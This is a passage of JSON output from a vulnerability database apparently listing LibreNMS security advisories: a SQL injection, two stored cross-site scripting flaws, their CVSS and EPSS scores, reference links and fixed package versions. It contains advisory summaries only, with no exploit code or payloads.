2Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-g84x-g96g-rcjc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83471?format=json","purl":"pkg:composer/librenms/librenms@24.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.11.0"}],"aliases":["CVE-2025-23201","GHSA-g84x-g96g-rcjc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yhmt-yukb-kuge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47536?format=json","vulnerability_id":"VCID-ywp5-cwm9-afb5","summary":"LibreNMS vulnerable to SQL injection time-based leads to database extraction\nSQL injection vulnerability in POST /search/search=packages in LibreNMS 24.3.0 allows a user with global read privileges to execute SQL commands via the package parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32461","reference_id":"","reference_type":"","scores":[{"value":"0.00151","scoring_system":"epss","scoring_elements":"0.35533","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00151","scoring_system":"epss","scoring_elements":"0.35485","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00151","scoring_system":"epss","scoring_elements":"0.35466","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00151","scoring_system":"epss","scoring_elements":"0.35505","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00151","scoring_system":"epss","scoring_elements":"0.35544","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32461"},{"reference_url":"https://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-04-23T00:24:26Z/"}],"url":"https://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/d29201fce134347f891102699fbde7070debee33","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-04-23T00:24:26Z/"}],"url":"https://github.com/librenms/librenms/commit/d29201fce134347f891102699fbde7070debee33"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32461","reference_id":"CVE-2024-32461","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32461"},{"reference_url":"https://github.com/advisories/GHSA-cwx6-cx7x-4q34","reference_id":"GHSA-cwx6-cx7x-4q34","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwx6-cx7x-4q34"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-cwx6-cx7x-4q34","reference_id":"GHSA-cwx6-cx7x-4q34","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-04-23T00:24:26Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-cwx6-cx7x-4q34"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69846?format=json","purl":"pkg:composer/librenms/librenms@24.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.4.0"}],"aliases":["CVE-2024-32461","GHSA-cwx6-cx7x-4q34"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ywp5-cwm9-afb5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48064?format=json","vulnerability_id":"VCID-z744-37t6-pud6","summary":"LibreNMS has a Stored XSS vulnerability in its Alert Transport name field\nLibreNMS <= 25.8.0 contains a **Stored Cross-Site Scripting (XSS)** vulnerability in the Alert Transports management functionality. When an administrator creates a new Alert Transport, the value of the `Transport name` field is stored and later rendered in the **Transports** column of the **Alert Rules** page without proper input validation or output encoding. This leads to arbitrary JavaScript execution in the admin’s browser.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62411","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00728","published_at":"2026-06-07T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00726","published_at":"2026-06-09T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00724","published_at":"2026-06-08T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00732","published_at":"2026-06-06T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00731","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62411"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/706a77085f4d5964f7de9444208ef707e1f79450","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-16T18:27:02Z/"}],"url":"https://github.com/librenms/librenms/commit/706a77085f4d5964f7de9444208ef707e1f79450"},{"reference_url":"https://github.com/librenms/librenms/commit/e1ead366239b57e88f9a06d4f7c213b1e2530cd8","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/e1ead366239b57e88f9a06d4f7c213b1e2530cd8"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/25.10.0","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/releases/tag/25.10.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62411","reference_id":"CVE-2025-62411","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62411"},{"reference_url":"https://github.com/advisories/GHSA-frc6-pwgr-c28w","reference_id":"GHSA-frc6-pwgr-c28w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-frc6-pwgr-c28w"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-frc6-pwgr-c28w","reference_id":"GHSA-frc6-pwgr-c28w","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-16T18:27:02Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-frc6-pwgr-c28w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70986?format=json","purl":"pkg:composer/librenms/librenms@25.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.10.0"}],"aliases":["CVE-2025-62411","GHSA-frc6-pwgr-c28w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z744-37t6-pud6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109274?format=json","vulnerability_id":"VCID-zech-eg55-gbcn","summary":"LibreNMS stored Cross-site Scripting via Schedule Maintenance `Title` parameter\nLibreNMS versions 22.8.0 and prior allow attackers to execute arbitrary JavaScript code via the Schedule Maintenance `Title` parameter. A patch is available and anticipated to be part of version 22.9.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3231","reference_id":"","reference_type":"","scores":[{"value":"0.0032","scoring_system":"epss","scoring_elements":"0.55366","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0032","scoring_system":"epss","scoring_elements":"0.55377","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0032","scoring_system":"epss","scoring_elements":"0.55372","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0032","scoring_system":"epss","scoring_elements":"0.55346","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0032","scoring_system":"epss","scoring_elements":"0.55316","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3231"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/08050020861230ff96a6507b309cc172a9e70af8","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/08050020861230ff96a6507b309cc172a9e70af8"},{"reference_url":"https://github.com/librenms/librenms/pull/14360","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/pull/14360"},{"reference_url":"https://huntr.dev/bounties/bcb6ee68-1452-4fdb-932a-f1031d10984f","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/bcb6ee68-1452-4fdb-932a-f1031d10984f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3231","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3231"},{"reference_url":"https://github.com/advisories/GHSA-3jh2-wmv7-m932","reference_id":"GHSA-3jh2-wmv7-m932","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3jh2-wmv7-m932"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146087?format=json","purl":"pkg:composer/librenms/librenms@22.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-3231","GHSA-3jh2-wmv7-m932"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zech-eg55-gbcn"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@21.2.0"}